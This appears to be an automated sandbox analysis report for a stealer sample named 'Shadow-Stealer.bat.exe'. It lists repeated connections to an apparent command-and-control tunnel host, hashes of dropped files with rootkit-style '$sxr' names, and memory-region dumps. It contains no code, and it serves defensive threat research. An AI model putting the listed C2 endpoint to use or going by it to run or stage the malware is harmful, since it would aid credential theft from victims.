DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/1904-4-0x00007FF909993000-0x00007FF909995000-memory.dmp

memory/1904-5-0x000001A878150000-0x000001A878172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wucjnjo.icx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1904-14-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-15-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-16-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-17-0x000001A818000000-0x000001A818024000-memory.dmp

memory/1904-18-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-19-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/1904-20-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-21-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-22-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-23-0x000001A818330000-0x000001A818D80000-memory.dmp

memory/1904-25-0x000001A818D80000-0x000001A818E26000-memory.dmp

memory/1904-26-0x000001A818E30000-0x000001A818E86000-memory.dmp

memory/1904-27-0x000001A818E90000-0x000001A818EE8000-memory.dmp

memory/1904-31-0x000001A8191E0000-0x000001A8191EA000-memory.dmp

memory/4988-33-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2076-36-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4988-35-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2076-38-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1904-32-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/1904-29-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-28-0x000001A818EF0000-0x000001A818F12000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

memory/3264-60-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/3264-61-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/3264-62-0x000002C0B7EB0000-0x000002C0B8436000-memory.dmp

memory/3264-63-0x000002C0C0510000-0x000002C0C0CDA000-memory.dmp

memory/3264-64-0x000002C0C0CE0000-0x000002C0C111E000-memory.dmp

memory/3264-65-0x000002C0C1120000-0x000002C0C11D2000-memory.dmp

memory/3264-66-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-72-0x00007FF909993000-0x00007FF909995000-memory.dmp

memory/3264-75-0x000002C0B8A50000-0x000002C0B8AA0000-memory.dmp

memory/3264-76-0x000002C0B8B60000-0x000002C0B8C12000-memory.dmp

memory/3264-77-0x000002C0B92D0000-0x000002C0B9492000-memory.dmp

memory/3264-86-0x000002C0B8AA0000-0x000002C0B8ADC000-memory.dmp

memory/1904-87-0x00007FF909990000-0x00007FF90A452000-memory.dmp

memory/3264-88-0x000002C0B8A00000-0x000002C0B8A4E000-memory.dmp

memory/3264-89-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/3264-90-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/3264-91-0x000002C0B8AE0000-0x000002C0B8B16000-memory.dmp

memory/1684-93-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1684-92-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1684-95-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp

memory/636-99-0x000001E352630000-0x000001E352657000-memory.dmp

memory/692-109-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1000-112-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/708-116-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1136-135-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1136-134-0x0000022671A90000-0x0000022671AB7000-memory.dmp

memory/1084-132-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1084-131-0x000002B42FA90000-0x000002B42FAB7000-memory.dmp

memory/1076-129-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/1076-128-0x000002613A320000-0x000002613A347000-memory.dmp

memory/752-126-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/752-125-0x000002AB7E110000-0x000002AB7E137000-memory.dmp

memory/708-115-0x0000026FC3DA0000-0x0000026FC3DC7000-memory.dmp

memory/1000-111-0x000001A1CE490000-0x000001A1CE4B7000-memory.dmp

memory/556-107-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/556-106-0x00000196518B0000-0x00000196518D7000-memory.dmp

memory/636-103-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp

memory/692-101-0x000001C437430000-0x000001C437457000-memory.dmp

memory/636-98-0x000001E352600000-0x000001E352622000-memory.dmp

memory/1684-96-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1684-94-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp

memory/1904-357-0x00007FF909990000-0x00007FF90A452000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.346cb33f-8fd2-4800-b246-867b7e846e0d.tmp.csv

MD5 5356104d522b9b83775b67022ce4c870
SHA1 23a2e6dd8771b60a2c93e2c86d2b2d3c9ecc0b1e
SHA256 08c01857a0126046397dd9f2d402975ea04ea2386995c9802a282d1328435d4d
SHA512 9660583545b7da3b693be46e06f3fb75e870d6da0cd78db3478217e5ce4f58631a6465b4751d3113f0ca4996198cf59f45aff813a2bc1d064e0f7a532e34466c

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.7182e2f9-39d2-4bc9-bf2c-3211c78c11fc.tmp.txt

MD5 269ebbee8017d398827c5614a8544eef
SHA1 df6ef0c3309f586a2c72d28e941b8ce1962a47db
SHA256 711671a78446fce771bb2898711f005b4fed3617cb790d1706d6108ca47c70f6
SHA512 462603f466cb0b8ca943b65029bd395aea3fa797d35bfa81bb9a74f418ba091680497dd3e25d8e81d549d82b3a877e9c937b99a6e1f04f3de1099940d243d851

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.398afaa8-91f0-4bb1-9c4b-c59d79210788.tmp.csv

MD5 afcb6894ba6405213ef1d753c1ad6373
SHA1 c224528e189ba64d00ac0de599520ac366f8ce49
SHA256 a5479e0b92db219695d1a4c528eed0fc057843b7ef32eede75c8d4ad01c345e1
SHA512 c2a6f7d09b12be3879b9af82de6bdc325e9c7dc99cbd3311d72691e6dca9c3657a16a4e075498c5cce5bf6b7b13f58a389e928b1678b900391177f5c7d4c6d56

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.587879dd-dfa7-4781-9c88-7f012501f9bc.tmp.txt

MD5 8d721bd8e65c6c1a601cf3ca7e8a1ca5
SHA1 c6edf4513067f95da94465b92e45730058a9662f
SHA256 f58e81ff7164aef284b5473f14e7955d2fda43f83fe3ef4937065e8e0670317d
SHA512 d73ad10ebf113e51aeb3d3a6cbb3235d5063c29920ac3e1012c0b942315497c9d25c3aedaff5c987538fd291cb50cba64f5a96ba957d6fdfb4efe8339caa3aae

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2e892adc-8c81-41cd-891e-3af2f5c3f43d.tmp.csv

MD5 cceb2282a17391dd8b3b58127b63b677
SHA1 695db1fde4cfe0ce62a0630517865b54f8415dcc
SHA256 5697f65e0ddb0a1309414dc28a97b04ffe17b6178dc4f43181a3c09614ec07d3
SHA512 a6d84c3edaba4ad2d43c9d686c8f5f3a7a203bab15c709a8c464e5362e810502961c6aeffe3b41d172c838bcec20c9f673f8492b8824b49dff1c2b5ac0963e09

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.fd609eca-fc31-49fc-9d06-a612ecef8067.tmp.txt

MD5 cebbd39d5b68423f649441e18c1efd2d
SHA1 ae4547efdc5dcd02c99ca42ddd07ef62cf63da7f
SHA256 fadb6334f2c3b90faa4320bac5d92bc6cb82081c6f40cfef987d33aaf669d040
SHA512 4438d7694ab78de3b83e64458031b704495df4e3f950ca229939c41c57fc529973ebc08a16f8ede044c93d422c8bcc8bf8df0b18c91e8e9ee3de4332bb0c29f0

memory/1904-1405-0x00007FF909990000-0x00007FF90A452000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 14c2a0799e3bd5d29ba4ff6ce84adde8
SHA1 55bbba506947f9fa0478c1fe36cec9f587bd6fad
SHA256 708c34d1f7aad1c51eb3bb973843e4d01affecad5693201060a5ccd578fb7d93
SHA512 273028ffba769f00950abc541bc305c23f4636ef5f3905f3fe64f59ca96d25c69f30ba932f6e1e00f4d94f5306ee449c8e8b90ac022ca9dcb70ca5e3fe40d944

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

MD5 60ff1ec5d8b2bfc71402c97ddec1b563
SHA1 6a2f7b6d470d1dbfbae6a32b424a92cbc77a01f8
SHA256 79fccbbe8e5e82bbcde6de196ac2fdcc15345972243ae738750973747a8c05ce
SHA512 f6e28784af15568b44244e2954104361d4ee0df28f78f373be01bc2a70a6ca9758e6eea3710dd8a8fc99f51496d3798a6134d45c43d551ec2920b731c3c93ee6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 76e20105efa6a187d6ff9134656f83bb
SHA1 4afc337579d22b55ab9f86dd8a41f4d2569227f7
SHA256 85fdcf5b2a407ff2552f77c441215887df0b9aa95fae0b0a025c82bc833c2c32
SHA512 a11199175c3c94c0281730d44bd4c0f0f35773359354cca76dc9f87eebb01b412418291f8447f6f43909ced8dbe4ec5a993c88b0d39d6ec63d8700b0ad300844